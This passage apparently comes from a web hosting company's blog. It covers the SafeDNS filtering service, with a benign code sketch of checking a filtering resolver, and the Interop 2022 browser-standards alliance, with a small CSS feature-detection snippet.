SafeDNS is also built on a network of 13 global data centers, and currently boasts 109 million sites in its database, sorted into 61 different subject content categories. The DNS-based filtering blocks unwanted sites before anyone has the chance to access them and create the immediate risk of the device being infected with one of the many types of malware.
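To illustrate the general idea of DNS-based filtering, here is a generic sketch of the mechanism on our part rather than SafeDNS’s actual implementation; the resolver address and block-page IP are placeholders. A filtering resolver simply answers queries for blocked domains with the address of a block page instead of the real site:

```typescript
import { Resolver } from "node:dns/promises";

// Placeholder values: substitute your filtering provider's resolver
// and the IP address of its block page.
const FILTERING_RESOLVER = "198.51.100.53";
const BLOCK_PAGE_IP = "198.51.100.1";

// Asks the filtering resolver for the domain; if it hands back the
// block-page address, the category policy has blocked the site.
async function isBlocked(domain: string): Promise<boolean> {
  const resolver = new Resolver();
  resolver.setServers([FILTERING_RESOLVER]);
  const addresses = await resolver.resolve4(domain);
  return addresses.includes(BLOCK_PAGE_IP);
}

isBlocked("malware-example.test").then((blocked) =>
  console.log(blocked ? "Blocked by policy" : "Allowed")
);
```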

What this does is allow for the creation of customized policies for your workers, and you can also take advantage of traffic monitoring services and a detailed service dashboard that puts you very much on top of your new and improved cybersecurity defenses. Plus, should your business grow, your policies can expand too; there is no limit on the number of users the filtering can cover.

New 4-Way Consortium Coming Together for More Consistent Web Standard

Uniformity tends to be a good thing the majority of the time, and that can be said no matter what it is we’re talking about. The biggest reason that is true is because it allows people to have expectations about what they’re going to experience, and to be able to rely on that experience time in and time out with every interaction. When it comes to web browsing you don’t even have to be a savvy individual to pick up on how not every page displays or behaves the same way based on what browser you’re using.

Now of course that would be dependent on you using a different browser, so if you use only one exclusively then this may be something you don’t pick up on. But most of us will move between them for whatever reason, and when we do we notice that it’s rare for pages to be the same based on browser choice. This is something that has been the norm for well over 20 years now, and while it’s not a deal breaker to have this happen, there would be something to be said for a more consistent web standard.

Here at 4GoodHosting we are like any Canadian web hosting provider who can see the appeal of that based on simple visual comfort levels. Even if we are not aware of it there is a calming and soothing part of seeing what we expect to see each time, and we can also understand that if there is any level of new exploration required because a page is displaying / behaving differently then that is definitely undesirable too.

So the reason that we’re making this newsworthy is because there is a new 4-way effort underway to establish a more consistent and better web standard.

New Standard

Apple is working with browser developers Google, Microsoft, and Mozilla to make web design technologies more consistent, and consistent independent of what browser people are using. The problem here is that some browsers have different built-in ways of handling web technologies. So in this sense there isn’t a single standard for the web, and we then have developers attempting to create consistent web interfaces across platforms, products, and elsewhere, when a particular browser has the potential to undo all of that.

These 4 make up the Interop 2022 alliance, and the aim, as stated, is to ascertain how web standards are implemented by the different vendors. Some of this builds on what came out of the Compat 2021 grouping.

The bigger picture aim of the project is to try to make it so that web applications based on these standards work and look the same no matter the device, platform, or operating system. The hope then is that eventually web developers will be able to be more confident that the end-user experiences they deliver will be experienced the way they intend them to be.

The further focus is on moving towards a future where making these areas interoperable is entirely possible, with constant updates to the relevant web standards for them, and extensive but quickly undertaken evaluation of how effective those updates are.

Tests of 15 Web Platforms

15 web platform specifications have been tested so far, along with three capabilities that have not been fully developed yet. The tests are for Cascade Layers, Color Spaces, CSS color functions, Scrolling and more. We can be sure that developers, users, and platform operators alike will all welcome improvements in this area.
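For developers wondering where a given browser stands on some of these features today, simple runtime feature detection is one way to check. Here is a small sketch; the specific value tests are our own examples, not part of the Interop 2022 test suite:

```typescript
// Runs in the browser: quick feature checks for a couple of the Interop 2022 focus areas.
const colorSpaces = CSS.supports("color", "lab(50% 40 59.5)"); // CSS Color 4 lab() support
const colorMixing = CSS.supports("color", "color-mix(in srgb, red 50%, blue)"); // color functions
const cascadeLayers = "CSSLayerBlockRule" in window; // @layer (Cascade Layers) support

console.log({ colorSpaces, colorMixing, cascadeLayers });
```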

Another thing that needs to be pointed out is that this new consortium is digging deeper than what you might expect would be the case to simply find general interoperability. However, browser code isn’t where they are looking for the most part; instead what Interop 2022 is focusing on is the finer details of experience and design. Part of the reason this approach is being taken is because browser developers won’t want to unlock access to core functionality for competitors, and for obvious reasons.

Some are saying that this is showcasing the limitations of WebKit in iOS development. The complaint is that developers of other browsers have no choice but to use WebKit rather than their own tech. It’s fair to assume Apple will not approve that request. Sure, it may point out Safari’s limitations, but it also could diminish hardware performance, security, and battery life.

Collective Criticisms

The goal of making the web as interoperable as it can be is an admirable one, and creating this reality shouldn’t take away from any of these 4 big players with regards to their primary development interests as competitors among each other. There are some saying Apple hasn’t accelerated implementation of some web APIs that might help developers create web apps to compete against native iOS apps. This is very likely true, but we can almost certainly say the same about Google at the very least.

All in all, this is a commendable and very potentially beneficial step. A more uniform web standard stands to be a plus for all of us, from developers right down to everyday web browsers and simple site visitors.